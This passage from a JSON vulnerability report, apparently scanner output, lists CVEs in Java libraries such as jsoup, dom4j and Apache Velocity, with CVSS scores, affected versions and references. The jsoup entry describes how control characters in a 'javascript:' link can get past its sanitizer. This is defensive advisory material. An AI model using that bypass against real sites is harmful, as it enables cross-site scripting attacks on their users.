This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711."}],"product_status":{"known_affected":["commons-net/commons-net@vers:maven/>=1.0.0|<=3.8.0"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/12/03/1"},{"summary":"Apache Advisory NET-711","url":"https://issues.apache.org/jira/browse/NET-711"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/o6yn9r9x6s94v97264hmgol1sf48mvx7"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00038.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37533"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37533"},{"summary":"Debian Advisory dsa-5307","url":"https://www.debian.org/security/2022/dsa-5307"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","version":"3.1"},"products":["commons-net/commons-net@vers:maven/>=1.0.0|<=3.8.0"]}],"title":"CVE-2021-37533/pkg:maven/commons-net/commons-net@3.6?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-26945"]}],"cve":"CVE-2020-26945"
,"cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-04-22T16:14:38","ids":[{"system_name":"CVE Record","text":"CVE-2020-26945"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"\"Deserialization errors in MyBatis\""},{"category":"details","details":"Vulnerability Details","text":"# \"Deserialization errors in MyBatis\" MyBatis before 3.5.6 mishandles deserialization of object streams leading to potential cache poisoning."}],"product_status":{"known_affected":["org.mybatis/mybatis@vers:maven/>=2.3.5|<=3.5.5"],"known_not_affected":["org.mybatis/mybatis@3.5.6"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26945"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26945"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.mybatis/mybatis@vers:maven/>=2.3.5|<=3.5.5"]}],"title":"CVE-2020-26945/pkg:maven/org.mybatis/mybatis@3.4.6?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13936"]}],"cve":"CVE-2020-13936","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-01-06T20:32:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-13936"},{"system_name":"Oracle 
Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Gentoo Advisory","text":"glsa-202107-52"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Sandbox Bypass in Apache Velocity Engine"},{"category":"details","details":"Vulnerability Details","text":"# Sandbox Bypass in Apache Velocity Engine An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache Velocity Engine versions up to 2.2."}],"product_status":{"known_affected":["org.apache.velocity/velocity@vers:maven/>=1.5|<=1.7"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/10/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01043f584cbd47959fabe18fff64de940f81a65024bb8dddbda31d9a%40%3Cuser.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01043f584cbd47959fabe18fff64de940f81a65024bb8dddbda31d9a@%3Cuser.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bc98e9cd080b4a13b905c571b9bed87e1a0878d44dbf21487c6cca4@%3Cdev.santuario.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17cb932fab14801b14e5b97a7f05192f4f366ef260c10d4a8dba8ac9@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r293284c6806c73f51098001ea86a14271c39f72cd76af9e946d9d9ad@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r39de20c7e9c808b1f96790875d33e58c9c0aabb44fd9227e7b3dc5da@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r3ea4c4c908505b20a4c268330dfe7188b90c84dcf777728d02068ae6@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4cd59453b65d4ac290fcb3b71fdf32b4f1f8989025e89558deb5a245@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r52a5129df402352adc34d052bab9234c8ef63596306506a89fdc7328@%3Cusers.activemq.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7f209b837217d2a0fe5977fb692e7f15d37fa5de8214bcdc4c21d9a7@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9dc2505651788ac668299774d9e7af4dc616be2f56fdc684d1170882@%3Cusers.activemq.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb042f3b0090e419cc9f5a3d32cf0baff283ccd6fcb1caea61915d6b6@%3Ccommits.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbee7270556f4172322936b5ecc9fabf0c09f00d4fa56c9de1963c340@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2a89e17e8a9b451ce655f1a34117752ea1d18a22ce580d8baa824fd@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e865c87f9043c21d9c1fd9d4df866061d9a08cfc322771160d8058@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re641197d204765130618086238c73dd2ce5a3f94b33785b587d72726@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re8e7482fe54d289fc0229e61cc64947b63b12c3c312e9f25bf6f3b8c@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reab5978b54a9f4c078402161e30a89c42807b198814acadbe6c862c7@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rf7d369de88dc88a1347006a3323b3746d849234db40a8edfd5ebc436@%3Cdev.ws.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00019.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13936"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13936"},{"summary":"Gentoo Advisory glsa-202107-52","url":"https://security.gentoo.org/glsa/202107-52"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.velocity/velocity@vers:maven/>=1.5|<=1.7"]}],"title":"CVE-2020-13936/pkg:maven/org.apache.velocity/velocity@1.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23926"]}],"cve":"CVE-2021-23926","cwe":{"id":"776","name":"Improper Restriction of Recursive Entity References in DTDs"},"discovery_date":"2021-06-16T17:37:11","ids":[{"system_name":"CVE Record","text":"CVE-2021-23926"},{"system_name":"Apache Advisory","text":"XMLBEANS-517"},{"system_name":"Oracle 
Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210513-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of Recursive Entity References in Apache XMLBeans"},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of Recursive Entity References in Apache XMLBeans The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0."}],"product_status":{"known_affected":["org.apache.xmlbeans/xmlbeans@vers:maven/>=2.2.0|<=2.6.0"]},"references":[{"summary":"Apache Advisory XMLBEANS-517","url":"https://issues.apache.org/jira/browse/XMLBEANS-517"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2dc5588009dc9f0310b7382269f932cc96cae4c3901b747dda1a7fed@%3Cjava-dev.axis.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbb01d10512098894cd5f22325588197532c64f1c818ea7e4120d40c1@%3Cjava-dev.axis.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/06/msg00024.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23926"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23926"},{"summary":"NetApp Advisory ntap-20210513-0004","url":"https://security.netapp.com/advisory/ntap-20210513-0004"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.1,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.1,"environmentalSeverity":"CRITICAL","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.1,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["org.apache.xmlbeans/xmlbeans@vers:maven/>=2.2.0|<=2.6.0"]}],"title":"CVE-2021-23926/pkg:maven/org.apache.xmlbeans/xmlbeans@2.3.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10683"]}],"cve":"CVE-2020-10683","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2020-06-05T16:13:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-10683"},{"system_name":"Owasp Advisory","text":"XML_External_Entity_Prevention_Cheat_Sheet"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200518-0002"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1694235"}],"notes":[{"category":"description","details":"Vulnerability 
Description","text":"dom4j allows External Entities by default which might enable XXE attacks"},{"category":"details","details":"Vulnerability Details","text":"# dom4j allows External Entities by default which might enable XXE attacks dom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. Note: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended."}],"product_status":{"known_affected":["dom4j/dom4j@vers:maven/>=1.1|<=1.6.1"],"known_not_affected":["dom4j/dom4j@2.1.3"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1694235"},{"summary":"Owasp Advisory XML_External_Entity_Prevention_Cheat_Sheet","url":"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"NetApp Advisory ntap-20200518-0002","url":"https://security.netapp.com/advisory/ntap-20200518-0002"},{"summary":"Oracle Advisory 
cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["dom4j/dom4j@vers:maven/>=1.1|<=1.6.1"]}],"title":"CVE-2020-10683/pkg:maven/dom4j/dom4j@1.6.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-23640"]}],"cve":"CVE-2022-23640","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2022-03-02T21:30:54","ids":[{"system_name":"CVE Record","text":"CVE-2022-23640"},{"system_name":"GitHub 
Advisory","text":"GHSA-xvm2-9xvc-hx7f"}],"notes":[{"audience":"developers","category":"other","text":"Improper Restriction of Recursive Entity References in DTDs","title":"Additional CWE: 776"},{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of XML External Entity Reference in com.monitorjbl:xlsx-streamer"},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of XML External Entity Reference in com.monitorjbl:xlsx-streamer ### Impact Prior to xlsx-streamer 2.1.0, the XML parser that was used did not apply all the necessary settings to prevent XML Entity Expansion issues. ### Patches Upgrade to version 2.1.0. ### Workarounds No known workaround. ### References https://github.com/monitorjbl/excel-streaming-reader/commit/0749c7b9709db078ccdeada16d46a34bc2910c73 ### For more information If you have any questions or comments about this advisory: * Open an issue in [monitorjbl/excel-streaming-reader](https://github.com/monitorjbl/excel-streaming-reader)"}],"product_status":{"known_affected":["com.monitorjbl/xlsx-streamer@vers:maven/>=0.2.3|<=2.0.0"]},"references":[{"summary":"GitHub Advisory GHSA-xvm2-9xvc-hx7f","url":"https://github.com/monitorjbl/excel-streaming-reader/security/advisories/GHSA-xvm2-9xvc-hx7f"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23640"},{"summary":"CVE 
Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23640"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.monitorjbl/xlsx-streamer@vers:maven/>=0.2.3|<=2.0.0"]}],"title":"CVE-2022-23640/pkg:maven/com.monitorjbl/xlsx-streamer@2.0.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-36033"]}],"cve":"CVE-2022-36033","cwe":{"id":"79","name":"Improper Neutralization of Input During Web Page Generation"},"discovery_date":"2022-09-01T22:14:57","ids":[{"system_name":"CVE Record","text":"CVE-2022-36033"},{"system_name":"GitHub Advisory","text":"GHSA-gp7f-rwcx-9369"},{"system_name":"NetApp Advisory","text":"ntap-20221104-0006"},{"system_name":"Jsoup Advisory","text":"release-1"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jsoup may not sanitize code injection XSS attempts if SafeList.preserveRelativeLinks is enabled"},{"category":"details","details":"Vulnerability Details","text":"# jsoup may not sanitize code injection XSS attempts if SafeList.preserveRelativeLinks is enabled jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow cross-site scripting (XSS) attacks when a reader subsequently clicks that link. 
If the non-default `SafeList.preserveRelativeLinks` option is enabled, HTML including `javascript:` URLs that have been crafted with control characters will not be sanitized. If the site that this HTML is published on does not set a Content Security Policy, an XSS attack is then possible. ### Impact Sites that accept input HTML from users and use jsoup to sanitize that HTML, may be vulnerable to cross-site scripting (XSS) attacks, if they have enabled `SafeList.preserveRelativeLinks` and do not set an appropriate Content Security Policy. ### Patches This issue is patched in jsoup 1.15.3. Users should upgrade to this version. Additionally, as the unsanitized input may have been persisted, old content should be cleaned again using the updated version. ### Workarounds To remediate this issue without immediately upgrading: - disable `SafeList.preserveRelativeLinks`, which will rewrite input URLs as absolute URLs - ensure an appropriate [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) is defined. (This should be used regardless of upgrading, as a defence-in-depth best practice.) ### Background and root cause jsoup includes a [Cleaner](https://jsoup.org/apidocs/org/jsoup/safety/Cleaner.html) component, which is designed to [sanitize input HTML](https://jsoup.org/cookbook/cleaning-html/safelist-sanitizer) against configurable safe-lists of acceptable tags, attributes, and attribute values. This includes removing potentially malicious attributes such as ``, which may enable XSS attacks. It does this by validating URL attributes against allowed URL protocols (e.g. `http`, `https`). However, an attacker may be able to bypass this check by embedding control characters into the href attribute value. This causes the Java URL class, which is used to resolve relative URLs to absolute URLs before checking the URL's protocol, to treat the URL as a relative URL. It is then resolved into an absolute URL with the configured base URI. 
For example, `java script:...` would resolve to `https://example.com/java script:...`. By default, when using a safe-list that allows `a` tags, jsoup will rewrite any relative URLs (e.g. `/foo/`) to an absolute URL (e.g. `https://example.com/foo/`). Therefore, this attack attempt would be successfully mitigated. However, if the option [SafeList.preserveRelativeLinks](https://jsoup.org/apidocs/org/jsoup/safety/Safelist.html#preserveRelativeLinks(boolean)) is enabled (which does not rewrite relative links to absolute), the input is left as-is. While Java will treat a path like `java script:` as a relative path, as it does not match the allowed characters of a URL spec, browsers may normalize out the control characters, and subsequently evaluate it as a `javascript:` spec inline expression. That disparity then leads to an XSS opportunity. Sites defining a Content Security Policy that does not allow javascript expressions in link URLs will not be impacted, as the policy will prevent the script's execution. 
### For more information If you have any questions or comments about this advisory: * Open an issue in [jsoup](https://github.com/jhy/jsoup) * Email the author of jsoup at [jonathan@hedley.net](mailto:jonathan@hedley.net) ### Credits Thanks to Jens Häderer, who reported this issue, and contributed to its resolution."}],"product_status":{"known_affected":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.15.3"],"known_not_affected":["org.jsoup/jsoup@1.15.3"]},"references":[{"summary":"GitHub Advisory GHSA-gp7f-rwcx-9369","url":"https://github.com/jhy/jsoup/security/advisories/GHSA-gp7f-rwcx-9369"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.15.3"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36033"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36033"},{"summary":"NetApp Advisory ntap-20221104-0006","url":"https://security.netapp.com/advisory/ntap-20221104-0006"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.1,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":6.1,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":6.1,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","version":"3.1"},"products":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.15.3"]}],"title":"CVE-2022-36033/pkg:maven/org.jsoup/jsoup@1.10.2?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37714"]}],"cve":"CVE-2021-37714","cwe":{"id":"248","name":"Uncaught 
Exception"},"discovery_date":"2021-08-23T19:42:38","ids":[{"system_name":"CVE Record","text":"CVE-2021-37714"},{"system_name":"GitHub Advisory","text":"GHSA-m72m-mhq2-9p6c"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0022"},{"system_name":"Jsoup Advisory","text":"release-1"}],"notes":[{"audience":"developers","category":"other","text":"Loop with Unreachable Exit Condition","title":"Additional CWE: 835"},{"category":"description","details":"Vulnerability Description","text":"Uncaught Exception in jsoup"},{"category":"details","details":"Vulnerability Details","text":"# Uncaught Exception in jsoup ### Impact _What kind of vulnerability is it? Who is impacted?_ Those using jsoup to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Users should upgrade to jsoup 1.14.2 ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Users may rate limit input parsing. Users should limit the size of inputs based on system resources. 
Users should implement thread watchdogs to cap and timeout parse runtimes."}],"product_status":{"known_affected":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.14.2"],"known_not_affected":["org.jsoup/jsoup@1.14.2"]},"references":[{"summary":"GitHub Advisory GHSA-m72m-mhq2-9p6c","url":"https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.14.1"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.14.2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215009dbf7467a9f6506d0c0024cb36cad30071010e62c9352cfaaf0@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r377b93d79817ce649e9e68b3456e6f499747ef1643fa987b342e082e@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d71f18adb78e50f626dde689161ca63d3b7491bd9718fcddfaecba7@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r50e9c9466c592ca9d707a5dea549524d19e3287da08d8392f643960e@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r685c5235235ad0c26e86d0ee987fb802c9675de6081dbf0516464e0b@%3Cnotifications.james.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r97404676a5cf591988faedb887d64e278f522adcaa823d89ca69defe@%3Cnotifications.james.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc3354080fc67fb50b45b3c2d12dc4ca2a3c1c78dad3d3ba012c038aa@%3Cnotifications.james.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37714"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37714"},{"summary":"NetApp Advisory ntap-20220210-0022","url":"https://security.netapp.com/advisory/ntap-20220210-0022"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.14.2"]}],"title":"CVE-2021-37714/pkg:maven/org.jsoup/jsoup@1.10.2?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-29425"]}]